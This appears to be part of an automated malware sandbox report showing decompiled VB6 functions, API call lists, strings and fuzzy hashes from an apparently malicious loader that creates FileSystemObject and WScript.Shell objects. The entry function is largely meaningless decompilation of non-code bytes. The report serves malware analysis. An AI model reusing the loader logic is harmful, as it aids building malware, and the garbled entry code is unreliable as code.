Instruction Fuzzy Hash: 1FD1F7B5900218EFDB10EFA4D985FCDBBB4BF08314F10819AE505BB292DB799A44CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0041EC5D, Relevance: 40.3, APIs: 18, Strings: 5, Instructions: 85
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E0041EC5D(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				char _v28;
				void* _v32;
				void* _v36;
				char _v52;
				char* _v76;
				intOrPtr _v84;
				signed int _v108;
				char _v116;
				short _v120;
				char* _t30;
				char* _t33;
				short _t34;
				short _t35;
				intOrPtr _t56;

				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t56;
				_push(0x68);
				L00401540();
				_v12 = _t56;
				_v8 = 0x401310;
				L004017B6();
				_push(0);
				_push(L"Scripting.FileSystemObject");
				_push( &_v52); // executed
				L004016F0(); // executed
				_t30 =  &_v52;
				_push(_t30);
				L004016F6();
				_push(_t30);
				_push( &_v28);
				L004016FC();
				L00401828();
				_v76 = L"Gulsoterne";
				_v84 = 8;
				_v108 = _v108 & 0x00000000;
				_v116 = 0x8002;
				_push(0x10);
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_push(1);
				_push(L"FolderExists");
				_push(_v28);
				_t33 =  &_v52;
				_push(_t33); // executed
				L004016EA(); // executed
				_push(_t33);
				_t34 =  &_v116;
				_push(_t34);
				L00401738();
				_v120 = _t34;
				L00401828();
				_t35 = _v120;
				if(_t35 != 0) {
					_push(0x9ae);
					L0040169C();
					L0040183A();
					_push(L"Propreste7");
					_push(L"Desorganisationens");
					L00401696();
					L0040183A();
				}
				_push(0x41ed86);
				L00401846();
				L004017C2();
				L00401846();
				L00401846();
				return _t35;
			}

0x0041ec62
0x0041ec6d
0x0041ec6e
0x0041ec75
0x0041ec78
0x0041ec80
0x0041ec83
0x0041ec90
0x0041ec95
0x0041ec97
0x0041ec9f
0x0041eca0
0x0041eca5
0x0041eca8
0x0041eca9
0x0041ecae
0x0041ecb2
0x0041ecb3
0x0041ecbb
0x0041ecc0
0x0041ecc7
0x0041ecce
0x0041ecd2
0x0041ecd9
0x0041ecdc
0x0041ece6
0x0041ece7
0x0041ece8
0x0041ece9
0x0041ecea
0x0041ecec
0x0041ecf1
0x0041ecf4
0x0041ecf7
0x0041ecf8
0x0041ed00
0x0041ed01
0x0041ed04
0x0041ed05
0x0041ed0a
0x0041ed11
0x0041ed16
0x0041ed1c
0x0041ed1e
0x0041ed23
0x0041ed2d
0x0041ed32
0x0041ed37
0x0041ed3c
0x0041ed46
0x0041ed46
0x0041ed4b
0x0041ed68
0x0041ed70
0x0041ed78
0x0041ed80
0x0041ed85

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 0041EC78
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 0041EC90
#716.MSVBVM60(?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041ECA0
__vbaObjVar.MSVBVM60(?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041ECA9
__vbaObjSetAddref.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041ECB3
__vbaFreeVar.MSVBVM60(?,00000000,?,?,Scripting.FileSystemObject,00000000,?,?,?,?,00401546), ref: 0041ECBB
__vbaChkstk.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041ECDC
__vbaLateMemCallLd.MSVBVM60(?,?,FolderExists,00000001), ref: 0041ECF8
__vbaVarTstNe.MSVBVM60(?,00000000), ref: 0041ED05
__vbaFreeVar.MSVBVM60(?,00000000), ref: 0041ED11
#697.MSVBVM60(000009AE,?,00000000), ref: 0041ED23
__vbaStrMove.MSVBVM60(000009AE,?,00000000), ref: 0041ED2D
__vbaStrCat.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041ED3C
__vbaStrMove.MSVBVM60(Desorganisationens,Propreste7,000009AE,?,00000000), ref: 0041ED46
__vbaFreeStr.MSVBVM60(0041ED86,?,00000000), ref: 0041ED68
__vbaFreeObj.MSVBVM60(0041ED86,?,00000000), ref: 0041ED70
__vbaFreeStr.MSVBVM60(0041ED86,?,00000000), ref: 0041ED78
__vbaFreeStr.MSVBVM60(0041ED86,?,00000000), ref: 0041ED80

Strings

Propreste7, xrefs: 0041ED32
Scripting.FileSystemObject, xrefs: 0041EC97
Desorganisationens, xrefs: 0041ED37
Gulsoterne, xrefs: 0041ECC0
FolderExists, xrefs: 0041ECEC

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$ChkstkMove$#697#716AddrefCallCopyLate
String ID: Desorganisationens$FolderExists$Gulsoterne$Propreste7$Scripting.FileSystemObject
API String ID: 3773181626-3836659718
Opcode ID: 5a9199407121b99956ee313859b52c75b90a526626e7129d8c482e02e5a6e01b
Instruction ID: 53d5095c33f66598e817e7f1e1b08461539a53cfbe1ac30ef9f24e2e0e0eecd3
Opcode Fuzzy Hash: 5a9199407121b99956ee313859b52c75b90a526626e7129d8c482e02e5a6e01b
Instruction Fuzzy Hash: 47314B71910209ABDB14EBA2CD86FEE7778AF11708F60493FB101770E2EBBC56458B58

Uniqueness

Uniqueness Score: -1.00%

Function 0042153C, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E0042153C(void* __ebx, void* __edi, void* __esi, void* __eflags, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				long long* _v28;
				char _v40;
				char _v44;
				char _v60;
				char* _t18;
				char* _t20;
				char* _t22;
				void* _t31;
				long long* _t32;

				_t32 = _t31 - 0x18;
				_push(0x401546);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t32;
				_t18 = 0x2c;
				L00401540();
				_v28 = _t32;
				_v24 = 0x4014e0;
				_v20 = 0;
				_v16 = 0;
				_v8 = 1;
				_t22 =  &_v40;
				L004017B6();
				_v8 = 2;
				_push(_t22);
				_push(_t22);
				 *_t32 =  *0x401520;
				L004015D6();
				L004015DC();
				asm("fcomp qword [0x401518]");
				asm("fnstsw ax");
				asm("sahf");
				if(__eflags < 0) {
					_v8 = 3;
					_push(0xffffffff);
					L004016E4();
					_v8 = 4;
					_push(0);
					_push(L"WScript.Shell");
					_push( &_v60); // executed
					L004016F0(); // executed
					_t20 =  &_v60;
					_push(_t20);
					L004016F6();
					_push(_t20);
					_t18 =  &_v44;
					_push(_t18);
					L004016FC();
					L00401828();
				}
				asm("wait");
				_push(0x421613);
				L00401846();
				L004017C2();
				return _t18;
			}

0x0042153f
0x00421542
0x0042154d
0x0042154e
0x00421557
0x00421558
0x00421560
0x00421563
0x0042156a
0x00421571
0x00421578
0x00421582
0x00421585
0x0042158a
0x00421597
0x00421598
0x00421599
0x0042159c
0x004215a1
0x004215a6
0x004215ac
0x004215ae
0x004215af
0x004215b1
0x004215b8
0x004215ba
0x004215bf
0x004215c6
0x004215c8
0x004215d0
0x004215d1
0x004215d6
0x004215d9
0x004215da
0x004215df
0x004215e0
0x004215e3
0x004215e4
0x004215ec
0x004215ec
0x004215f1
0x004215f2
0x00421605
0x0042160d
0x00421612

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421558
__vbaStrCopy.MSVBVM60(?,?,?,?,00401546), ref: 00421585
#582.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042159C
__vbaFpR8.MSVBVM60(?,?,?,?,?,?,00401546), ref: 004215A1
__vbaOnError.MSVBVM60(000000FF,?,?,?,?,?,?,00401546), ref: 004215BA
#716.MSVBVM60(000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004215D1
__vbaObjVar.MSVBVM60(000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004215DA
__vbaObjSetAddref.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004215E4
__vbaFreeVar.MSVBVM60(?,00000000,000000FF,000000FF,WScript.Shell,00000000,000000FF,?,?,?,?,?,?,00401546), ref: 004215EC
__vbaFreeStr.MSVBVM60(00421613,?,?,?,?,?,?,00401546), ref: 00421605
__vbaFreeObj.MSVBVM60(00421613,?,?,?,?,?,?,00401546), ref: 0042160D

Strings

WScript.Shell, xrefs: 004215C8

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#582#716AddrefChkstkCopyError
String ID: WScript.Shell
API String ID: 2682307056-813827646
Opcode ID: 6975d5505eb360c6321a3370caac20092a3affa4bc7f17956be877ce19631b9a
Instruction ID: 5e0a88cef722a4cb6d5112415d638f651bf88761dcf130cb8beb7f6bd686b89e
Opcode Fuzzy Hash: 6975d5505eb360c6321a3370caac20092a3affa4bc7f17956be877ce19631b9a
Instruction Fuzzy Hash: 95114FB1900208BBCB10EFA1DD46BDEBBB8AB04708F50456EF101771E1DB7D56048B98

Uniqueness

Uniqueness Score: -1.00%

Function 00421626, Relevance: 15.1, APIs: 10, Instructions: 102
COMMON

Download Yara Rule

C-Code - Quality: 54%

			E00421626(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				intOrPtr _v44;
				intOrPtr _v52;
				intOrPtr _v60;
				intOrPtr _v68;
				char _v72;
				signed int _v76;
				signed int _v84;
				signed int _v88;
				signed int _t50;
				signed int _t62;
				void* _t67;
				void* _t74;
				intOrPtr _t76;

				_t67 = __edx;
				 *[fs:0x0] = _t76;
				L00401540();
				_v12 = _t76;
				_v8 = 0x401528;
				L004016FC();
				_t50 =  *((intOrPtr*)( *_a4 + 0x58))(_a4,  &_v72,  &_v24, _a4, __edi, __esi, __ebx, 0x44,  *[fs:0x0], 0x401546, __ecx, __ecx, _t74);
				asm("fclex");
				_v76 = _t50;
				if(_v76 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x58);
					_push(0x4022f0);
					_push(_a4);
					_push(_v76);
					L004017C8();
					_v84 = _t50;
				}
				_v32 = _v72;
				L004016FC();
				L004015D0();
				_v28 = E00421979( &_v36);
				L004017C2();
				_v32 = E00421979(_v28) + 0x2b0;
				E004217E5(_t67, _v32, _a8);
				_v60 = 0x80020004;
				_v68 = 0xa;
				_v44 = 0x80020004;
				_v52 = 0xa;
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				L00401540();
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsd");
				_t62 =  *((intOrPtr*)( *_a4 + 0x2b0))(_a4, 0x10, 0x10,  &_v36,  &_v36, _a4);
				asm("fclex");
				_v76 = _t62;
				if(_v76 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x2b0);
					_push(0x4022f0);
					_push(_a4);
					_push(_v76);
					L004017C8();
					_v88 = _t62;
				}
				_push(0x421769);
				L004017C2();
				return _t62;
			}

0x00421626
0x00421637
0x00421641
0x00421649
0x0042164c
0x0042165a
0x0042166b
0x0042166e
0x00421670
0x00421677
0x00421690
0x00421679
0x00421679
0x0042167b
0x00421680
0x00421683
0x00421686
0x0042168b
0x0042168b
0x00421697
0x004216a1
0x004216aa
0x004216b5
0x004216bb
0x004216cd
0x004216d6
0x004216db
0x004216e2
0x004216e9
0x004216f0
0x004216fa
0x00421704
0x00421705
0x00421706
0x00421707
0x0042170b
0x00421715
0x00421716
0x00421717
0x00421718
0x00421721
0x00421727
0x00421729
0x00421730
0x0042174c
0x00421732
0x00421732
0x00421737
0x0042173c
0x0042173f
0x00421742
0x00421747
0x00421747
0x00421750
0x00421763
0x00421768

APIs

__vbaChkstk.MSVBVM60(?,00401546), ref: 00421641
__vbaObjSetAddref.MSVBVM60(?,?,?,?,?,?,00401546), ref: 0042165A
__vbaHresultCheckObj.MSVBVM60(00000000,?,004022F0,00000058), ref: 00421686
__vbaObjSetAddref.MSVBVM60(?,?), ref: 004216A1
#644.MSVBVM60(?,?,?), ref: 004216AA
__vbaFreeObj.MSVBVM60(00000000,?,?,?), ref: 004216BB
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 004216FA
__vbaChkstk.MSVBVM60(?,?,?,00000000,?,?,?), ref: 0042170B
__vbaHresultCheckObj.MSVBVM60(00000000,?,004022F0,000002B0), ref: 00421742
__vbaFreeObj.MSVBVM60(00421769), ref: 00421763

Memory Dump Source

Source File: 00000000.00000002.775514902.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.775508377.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.775573308.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.775583618.0000000000425000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Chkstk$AddrefCheckFreeHresult$#644
String ID:
API String ID: 1032928638-0
Opcode ID: a2040e8022a1144dd0260741822daa13c07c839ad227a378d5cdcfb69577a3b9
Instruction ID: 45dd406085cf930c97b31e6e0ad86b4665c786ed57aefc1b6e6b2491ec8dfd26
Opcode Fuzzy Hash: a2040e8022a1144dd0260741822daa13c07c839ad227a378d5cdcfb69577a3b9
Instruction Fuzzy Hash: EC4116B1900218AFCF01EF91DC86BDEBBB9FF44744F10442AF501BB1A1D7B99A469B58

Uniqueness

Uniqueness Score: -1.00%

Function 00401888, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			_entry_(signed int __eax, signed int __ebx, intOrPtr* __ecx, void* __edx, void* __edi, void* __esi, void* __fp0, char _a1, intOrPtr _a3, intOrPtr _a16417) {
				intOrPtr _v9;
				intOrPtr _v13;
				void* _v24;
				void* _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				void* _v44;
				void* _v48;
				char _v64;
				char _v65;
				char _v80;
				char _v96;
				char* _v104;
				char* _v105;
				char _v112;
				char _v113;
				char* _v120;
				char _v128;
				void* _v148;
				short _v152;
				short _v153;
				signed int _v156;
				intOrPtr* _v160;
				signed int _v164;
				intOrPtr* _v172;
				signed int _v176;
				signed int _v180;
				intOrPtr _v1040170976;
				signed char _t246;
				signed int _t247;
				signed char _t249;
				intOrPtr* _t250;
				intOrPtr* _t251;
				intOrPtr* _t252;
				intOrPtr* _t253;
				intOrPtr* _t254;
				intOrPtr* _t255;
				void* _t256;
				signed int _t257;
				signed int _t258;
				signed int _t259;
				signed int _t260;
				intOrPtr* _t261;
				signed char _t263;
				signed char _t264;
				signed int _t265;
				signed int _t266;
				signed int _t267;
				signed int _t268;
				intOrPtr* _t269;
				intOrPtr* _t270;
				signed int _t271;
				signed char _t272;
				signed char _t273;
				intOrPtr* _t274;
				signed int _t276;
				void* _t278;
				signed int _t279;
				signed char _t281;
				signed char _t282;
				signed int _t283;
				short _t288;
				signed int _t289;
				char* _t293;
				char* _t298;
				signed int _t309;
				signed int _t314;
				intOrPtr* _t315;
				void* _t318;
				signed char _t320;
				signed char _t328;
				void* _t329;
				intOrPtr* _t332;
				intOrPtr* _t334;
				signed char _t335;
				signed int* _t336;
				intOrPtr* _t337;
				void* _t338;
				intOrPtr* _t358;
				intOrPtr* _t360;
				signed char _t361;
				signed char _t362;
				void* _t363;
				signed int _t365;
				signed char* _t373;
				intOrPtr _t374;
				signed int _t379;
				void* _t380;
				void* _t381;
				signed int _t382;
				void* _t384;
				void* _t387;
				intOrPtr* _t388;
				intOrPtr _t392;
				intOrPtr _t400;
				intOrPtr _t405;
				signed char _t408;

				_push("VB5!6&*"); // executed
				L00401882(); // executed
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax ^ __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				_pop(es);
				asm("sahf");
				 *(__edx + __ecx - 0x42b8711d) =  *(__edx + __ecx - 0x42b8711d) ^ __eax;
				asm("adc bl, ch");
				_t332 = __ecx;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *_t332 =  *_t332 + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__eax + __eax)) =  *((intOrPtr*)(__eax + __eax)) + __eax;
				 *__eax =  *__eax + __eax;
				_t358 = __edx + 1;
				_t334 = _t332 - 1 + 1;
				 *__ebx =  *__ebx + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				_t387 = _t384 + 1;
				 *__eax =  *__eax ^ __eax;
				 *0x8ddc4e59 =  *0x8ddc4e59 + _t358;
				0x6341(_t358, _t381);
				if( *0x8ddc4e59 <= 0) {
					asm("adc [eax], eax");
				}
				asm("insb");
				asm("in eax, 0x19");
				asm("cld");
				0xe1c93453();
				_t373 = __edi - 1;
				asm("lodsd");
				asm("stosb");
				 *0x22D1BEAC =  *((intOrPtr*)(0x22d1beac)) + 0x22d1bed8;
				_t246 = __ebx ^  *(_t334 - 0x48ee309a);
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t334 =  *_t334 + _t334;
				 *_t246 =  *_t246 + _t246;
				 *_t373 =  *_t373 + _t246;
				_t373[0x55] = _t373[0x55] + _t246;
				_t388 = _t387 - 1;
				_t335 = _t334 + 1;
				_push(_t358);
				_t382 =  &_a1;
				 *0x53000b01 =  *0x53000b01 + _t335;
				_t379 =  *(_t358 + 0x69) * 0x64;
				asm("gs outsb");
				if(_t379 >= 0) {
					L6:
					 *_t358 =  *_t358 + _t246;
					 *((intOrPtr*)(_t335 + 0x40)) =  *((intOrPtr*)(_t335 + 0x40)) + _t335;
					 *_t246 =  *_t246 + _t246;
					asm("invalid");
					asm("invalid");
					asm("invalid");
					asm("invalid");
					 *_t246 =  *_t246 + _t246;
					goto L7;
				} else {
					 *_t335 =  *_t335 + 0x22d1bed8;
					 *_t246 =  *_t246 + _t246;
					_t360 = _t358 + 1;
					 *((intOrPtr*)(0x22d1bed8 + _t335)) =  *((intOrPtr*)(0x22d1bed8 + _t335)) + _t246;
					 *0x22D1BF43 =  *((intOrPtr*)(0x22d1bf43)) + _t360;
					_t400 =  *((intOrPtr*)(0x22d1bf43));
					if(_t400 >= 0) {
						asm("gs outsb");
						if(_t400 < 0) {
							 *0x159f =  *0x159f + _t360;
							asm("sbb eax, [ds:eax]");
							_t335 = _t335 + _t360;
							_push(cs);
							 *_t246 =  *_t246 + _t246;
							asm("les edx, [ecx]");
							 *_t246 =  *_t246 + _t246;
							_t388 = _t388 + 1;
							 *((intOrPtr*)(_t379 + 3)) =  *((intOrPtr*)(_t379 + 3)) + _t246;
							 *((intOrPtr*)(_t246 + _t246)) =  *((intOrPtr*)(_t246 + _t246)) + 1;
							_push(es);
							 *_t246 =  *_t246 + _t246;
							 *((intOrPtr*)(_t246 + 0x1004031)) =  *((intOrPtr*)(_t246 + 0x1004031)) + _t335;
							goto L6;
						}
						L7:
						 *_t246 =  *_t246 + _t246;
						 *((intOrPtr*)(_t246 + 0x22)) =  *((intOrPtr*)(_t246 + 0x22)) + _t246;
						_t247 = _t246 + 1;
						 *((intOrPtr*)(_t247 + _t379)) =  *((intOrPtr*)(_t247 + _t379)) + 0x22d1bed8;
						 *_t247 =  *_t247 + _t247;
						 *_t247 =  *_t247 + _t247;
						 *_t247 =  *_t247 + 0x22d1bed8;
						asm("fistp dword [ecx]");
						 *_t247 =  *_t247 + _t247;
						 *_t247 =  *_t247 + _t247;
						 *_t247 =  *_t247 + _t247;
						 *_t247 =  *_t247 + _t247;
						 *((intOrPtr*)(_t247 + 0x56004019)) =  *((intOrPtr*)(_t247 + 0x56004019)) + 0x22d1bed8;
						_t360 = _t358 + 2;
						_t246 = _t247 ^ 0x2a263621;
						 *_t246 =  *_t246 + _t246;
					}
				}
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t379 =  *_t379 + 0x22d1bed8;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				 *_t246 =  *_t246 + _t246;
				_t249 = (_t246 |  *_t246) + 4;
				 *_t249 =  *_t249 + _t249;
				 *_t249 =  *_t249 + _t249;
				 *_t249 =  *_t249 + _t249;
				 *_t249 =  *_t249 + _t249;
				 *_t249 =  *_t249 + _t249;
				asm("pushfd");
				asm("sbb al, 0x40");
				 *_t249 =  *_t249 + _t249;
				asm("lock xor [ecx], al");
				_t328 = 0x45a37db0;
				asm("invalid");
				 *_t249 =  *_t249 | _t249;
				 *_t249 =  *_t249 + _t249;
				 *_t249 =  *_t249 + _t249;
				 *_t249 =  *_t249 + _t249;
				_t250 = _t249 +  *_t249;
				 *_t250 =  *_t250 + _t250;
				_t405 =  *_t250;
				while(1) {
					goto 0x4c401a05;
					asm("sbb al, [eax]");
					if(_t405 >= 0) {
						_t250 = _t250 + 1;
						 *((intOrPtr*)(_t250 + _t328 + 0x780040)) =  *((intOrPtr*)(_t250 + _t328 + 0x780040)) + _t360;
						 *_t250 =  *_t250 + _t250;
						 *_t250 =  *_t250 + _t250;
						 *_t250 = es;
						 *_t250 =  *_t250 + _t250;
						 *_t250 =  *_t250 + _t250;
						 *_t250 =  *_t250 + _t250;
						 *_t250 =  *_t250 + _t250;
					}
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					 *_t250 =  *_t250 + _t250;
					_t40 =  &(_t373[0x66 + _t382 * 2]);
					 *_t40 = _t373[0x66 + _t382 * 2] + _t360;
					_t408 =  *_t40;
					asm("o16 jb 0x72");
				}
				asm("clc");
				 *_t373 =  *_t373 << _t335;
				asm("lodsd");
				asm("aam 0x35");
				_t360 = _t360 + 1;
				_t250 = 0xb98b740c;
				_t374 =  *((intOrPtr*)(_t335 + 0x55a014));
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t335 =  *_t335 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *_t250 =  *_t250 + _t250;
				 *0x18d =  *0x18d + _t328;
				 *_t250 =  *_t250 + _t250;
				 *((intOrPtr*)(_t250 - 0x63ffbfcc)) =  *((intOrPtr*)(_t250 - 0x63ffbfcc)) + _t335;
				 *_t250 =  *_t250 + _t250;
				 *_t335 =  *_t335 + _t250;
				 *_t335 =  *_t335 + _t250;
				 *((intOrPtr*)(_t335 + 0x40)) =  *((intOrPtr*)(_t335 + 0x40)) + _t335;
				 *_t250 =  *_t250 + _t250;
				_t251 = _t250 - 1;
				asm("les eax, [ecx]");
				asm("invalid");
				asm("invalid");
				 *_t251 =  *_t251 + _t251;
				 *_t251 =  *_t251 + _t251;
				asm("adc [edx], ah");
				_t252 = _t251 + 1;
				 *((intOrPtr*)(_t252 + _t379 + 0x42)) =  *((intOrPtr*)(_t252 + _t379 + 0x42)) + _t335;
				 *_t252 =  *_t252 + _t252;
				 *_t252 =  *_t252 + _t252;
				_t253 = _t252 + _t360;
				asm("wait");
				 *_t253 =  *_t253 + _t253;
				 *_t253 =  *_t253 + _t253;
				 *_t253 =  *_t253 + _t253;
				 *_t253 =  *_t253 + _t253;
				 *_t253 =  *_t253 + _t253;
				 *_t253 =  *_t253 + _t253;
				 *((intOrPtr*)(_t328 + _t328 + 0x40)) =  *((intOrPtr*)(_t328 + _t328 + 0x40)) + _t253;
				 *_t335 =  *_t335 + _t253;
				 *_t253 =  *_t253 + _t253;
				 *((intOrPtr*)(_t253 + 0x34)) =  *((intOrPtr*)(_t253 + 0x34)) + _t360;
				_t254 = _t253 + 1;
				 *_t254 =  *_t254 + _t254;
				 *_t254 =  *_t254 + _t254;
				 *((intOrPtr*)(_t328 + _t328 + 0x40)) =  *((intOrPtr*)(_t328 + _t328 + 0x40)) + _t254;
				 *_t335 =  *_t335 + _t254;
				 *_t254 =  *_t254 + _t254;
				 *((intOrPtr*)(_t328 + _t328 + 0x40)) =  *((intOrPtr*)(_t328 + _t328 + 0x40)) + _t335;
				 *_t254 =  *_t254 + _t254;
				 *_t254 =  *_t254 + _t254;
				 *((intOrPtr*)(_t254 + 0x1b)) =  *((intOrPtr*)(_t254 + 0x1b)) + _t335;
				_t255 = _t254 + 1;
				 *_t360 =  *_t360 + _t255;
				 *_t255 =  *_t255 + _t255;
				 *((intOrPtr*)(_t328 + _t328 + 0x40)) =  *((intOrPtr*)(_t328 + _t328 + 0x40)) + _t335;
				 *_t255 =  *_t255 + _t255;
				 *((intOrPtr*)(_t374 + 0x6c006801)) =  *((intOrPtr*)(_t374 + 0x6c006801)) + _t360;
				 *((intOrPtr*)(_t328 + _t328 + 0x33cc0040)) =  *((intOrPtr*)(_t328 + _t328 + 0x33cc0040)) + _t328;
				_t361 = _t360 + 1;
				 *_t255 =  *_t255 + _t255;
				 *_t255 =  *_t255 + _t255;
				 *((intOrPtr*)(_t328 + _t374 + 0x3460009f)) =  *((intOrPtr*)(_t328 + _t374 + 0x3460009f)) + _t328;
				_t256 = _t255 + 1;
				 *((intOrPtr*)(_t256 + 0x34)) =  *((intOrPtr*)(_t256 + 0x34)) + _t361;
				_t257 = _t256 + 1;
				 *_t257 =  *_t257 + _t257;
				_t258 = _t257 | 0x00003400;
				 *((intOrPtr*)(_t258 + 0x1004034)) =  *((intOrPtr*)(_t258 + 0x1004034)) + _t258;
				 *_t328 =  *_t328 + _t258;
				 *_t258 =  *_t258 + _t258;
				 *_t258 =  *_t258 + _t258;
				 *_t258 =  *_t258 + _t258;
				 *_t258 =  *_t258 + _t258;
				 *((intOrPtr*)(_t328 + _t328 - 0x437fffc0)) =  *((intOrPtr*)(_t328 + _t328 - 0x437fffc0)) + _t328;
				asm("sahf");
				 *((intOrPtr*)(_t258 + 0x1004034)) =  *((intOrPtr*)(_t258 + 0x1004034)) + _t361;
				 *_t328 =  *_t328 + _t258;
				 *_t258 =  *_t258 + _t258;
				ds = _t374;
				 *_t258 =  *_t258 + _t328;
				 *_t258 =  *_t258 + _t258;
				 *_t258 =  *_t258 + _t361;
				_t259 = _t258 &  *_t258;
				asm("invalid");
				asm("invalid");
				 *_t259 =  *_t259 + _t259;
				 *_t259 =  *_t259 + _t259;
				 *_t259 =  *_t259 + _t259;
				 *_t259 =  *_t259 + _t259;
				 *(_t259 + _t259 * 2) =  *(_t259 + _t259 * 2) | _t328;
				 *((intOrPtr*)(_t259 + 0x40009c15)) =  *((intOrPtr*)(_t259 + 0x40009c15)) + _t335;
				_t260 = _t259 &  *_t259;
				asm("invalid");
				asm("invalid");
				 *_t260 =  *_t260 + _t260;
				 *_t260 =  *_t260 + _t260;
				asm("insb");
				asm("sbb eax, [eax]");
				asm("in al, dx");
				asm("sbb al, [eax]");
				if( *_t260 >= 0) {
					 *((intOrPtr*)(_t379 + 0x18)) =  *((intOrPtr*)(_t379 + 0x18)) + _t361;
					_t260 = _t260 + 2;
					 *((intOrPtr*)(_t260 + _t328 + 0x40)) =  *((intOrPtr*)(_t260 + _t328 + 0x40)) + _t328;
					 *_t260 =  *_t260 + _t260;
					 *_t260 =  *_t260 + _t260;
					 *_t260 =  *_t260 + _t260;
					 *_t260 =  *_t260 + _t260;
